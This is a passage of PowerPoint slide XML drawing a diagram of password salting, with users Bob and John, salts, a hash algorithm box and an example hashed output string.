        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1276482" y="2630621"/>
            <a:ext cx="1646503" cy="1683993"/>
            <a:chOff x="0" y="11147"/>
            <a:chExt cx="1646502" cy="1683991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1142" name="User_UserHalfA01" descr="User_UserHalfA01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="425882" y="430784"/>
              <a:ext cx="803770" cy="1264356"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1143" name="Bob"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="11147"/>
              <a:ext cx="1646503" cy="396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1300480">
                <a:defRPr sz="1800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Bob</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1147" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1283255" y="5538639"/>
            <a:ext cx="1646503" cy="1683992"/>
            <a:chOff x="0" y="11147"/>
            <a:chExt cx="1646502" cy="1683991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1145" name="User_UserHalfA01" descr="User_UserHalfA01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="425882" y="430784"/>
              <a:ext cx="803770" cy="1264356"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1146" name="John"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="11147"/>
              <a:ext cx="1646503" cy="396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1300480">
                <a:defRPr sz="1800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>John</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8970150" y="3610186"/>
            <a:ext cx="1361442" cy="54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44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="233" y="1165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466" y="941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986" y="627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1506" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1757" y="314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2026" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2581" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2868" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4929" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5557" y="224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6166" y="493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6794" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7457" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8066" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8407" y="1524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8730" y="1748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9339" y="2196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="2644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612" y="3092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11275" y="3675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11884" y="4212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12494" y="4840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13103" y="5422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13713" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14304" y="6812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14878" y="7529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15416" y="8246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15971" y="8963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17011" y="10486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17477" y="11293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17943" y="12144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18391" y="12906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18445" y="12503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18571" y="11607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18768" y="10397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20202" y="16043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21170" y="19852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20829" y="21017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19090" y="19807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17352" y="18508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16545" y="17925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17029" y="16984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17316" y="16536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17423" y="16267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17298" y="15954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17119" y="15550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16671" y="14654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16079" y="13578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15738" y="12951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15380" y="12324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14537" y="10890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14107" y="10262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13605" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13103" y="8739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12028" y="7305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11454" y="6588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10845" y="5960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10235" y="5243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9572" y="4661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8927" y="3988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8246" y="3495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7582" y="2958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6883" y="2465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5413" y="1658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4661" y="1389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3137" y="1076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1577" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789" y="1165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1344"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1149" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2759004" y="3587608"/>
            <a:ext cx="1347894" cy="2325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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1152" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4251395" y="6260817"/>
            <a:ext cx="1634632" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1150" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1151" name="passjohn"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="245655" y="34459"/>
              <a:ext cx="1143321"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>passjohn</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1155" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7133157" y="5656043"/>
            <a:ext cx="2066450" cy="1376935"/>
            <a:chOff x="0" y="11147"/>
            <a:chExt cx="2066448" cy="1376934"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="1153" name="ServerProcess01" descr="ServerProcess01"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="387499" y="403690"/>
              <a:ext cx="1282419" cy="984392"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700" cap="flat">
              <a:noFill/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1154" name="Hash Algorithm"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="11147"/>
              <a:ext cx="2066449" cy="396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1300480">
                <a:defRPr sz="1800">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr>
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1800"/>
                <a:t>Hash Algorithm</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6005688" y="6421120"/>
            <a:ext cx="1347895" cy="2325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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="1157" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2754488" y="6459502"/>
            <a:ext cx="1347895" cy="2325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57" y="6217"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16585" y="3056"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16512" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="5584"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="9378"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21383" y="11696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20803" y="12960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19047" y="16437"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16476" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16693" y="15700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="11274"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16657" y="6217"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1160" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9683608" y="7145866"/>
            <a:ext cx="1634633" cy="541868"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="1634631" cy="541866"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1158" name="Rounded Rectangle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="1634632" cy="541867"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 4167"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFFFFF"/>
            </a:solidFill>
            <a:ln w="12700" cap="flat">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="88900" dist="50800" dir="2700000">
                <a:srgbClr val="AFAFAF"/>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="65023" tIns="65023" rIns="65023" bIns="65023" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="1300480">
                <a:defRPr sz="2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:pPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1159" name=";f4^#$gqtt"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="200784" y="34459"/>
              <a:ext cx="1233064"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2400">
                  <a:latin typeface="Arial Narrow"/>
                  <a:ea typeface="Arial Narrow"/>
                  <a:cs typeface="Arial Narrow"/>
                  <a:sym typeface="Arial Narrow"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr/>
              <a:r>
                <a:t>;f4^#$gqtt</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1161" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8965635" y="6450470"/>
            <a:ext cx="1361441" cy="54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44"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="233" y="1165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="466" y="941"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="986" y="627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1506" y="359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1757" y="314"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2026" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2581" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2868" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3155" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3728" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4338" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4929" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5557" y="224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6166" y="493"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6794" y="717"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7457" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8066" y="1344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8407" y="1524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8730" y="1748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9339" y="2196"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10002" y="2644"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10612" y="3092"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11275" y="3675"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11884" y="4212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12494" y="4840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13103" y="5422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13713" y="6095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14304" y="6812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14878" y="7529"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15416" y="8246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15971" y="8963"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17011" y="10486"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17477" y="11293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17943" y="12144"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18391" y="12906"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18445" y="12503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18571" y="11607"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18768" y="10397"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20202" y="16043"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21170" y="19852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20829" y="21017"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19090" y="19807"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17352" y="18508"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16545" y="17925"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17029" y="16984"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17316" y="16536"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17423" y="16267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17298" y="15954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17119" y="15550"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16671" y="14654"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16079" y="13578"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15738" y="12951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15380" y="12324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14537" y="10890"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14107" y="10262"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13605" y="9456"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13103" y="8739"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12028" y="7305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11454" y="6588"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10845" y="5960"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10235" y="5243"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9572" y="4661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8927" y="3988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8246" y="3495"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7582" y="2958"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6883" y="2465"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5413" y="1658"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4661" y="1389"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3137" y="1076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2348" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1577" y="1031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1183" y="1076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="789" y="1165"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="376" y="1210"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1344"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000">
              <a:alpha val="74900"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="65023" tIns="65023" rIns="65023" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:defRPr b="1" sz="2800">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1162" name="Salt = “bob”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4405293" y="2935111"/>
            <a:ext cx="1333610" cy="460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1300480">
              <a:defRPr i="1" sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
                <a:cs typeface="Arial Narrow"/>
                <a:sym typeface="Arial Narrow"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr i="0" sz="2400"/>
            </a:pPr>
            <a:r>
              <a:rPr i="1" sz="2200"/>
              <a:t>Salt = “bob”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1163" name="Salt = “john”"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4371947" y="5800231"/>
            <a:ext cx="1384497" cy="460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1300480">
              <a:defRPr i="1" sz="2200">
                <a:latin typeface="Arial Narrow"/>
                <a:ea typeface="Arial Narrow"/>
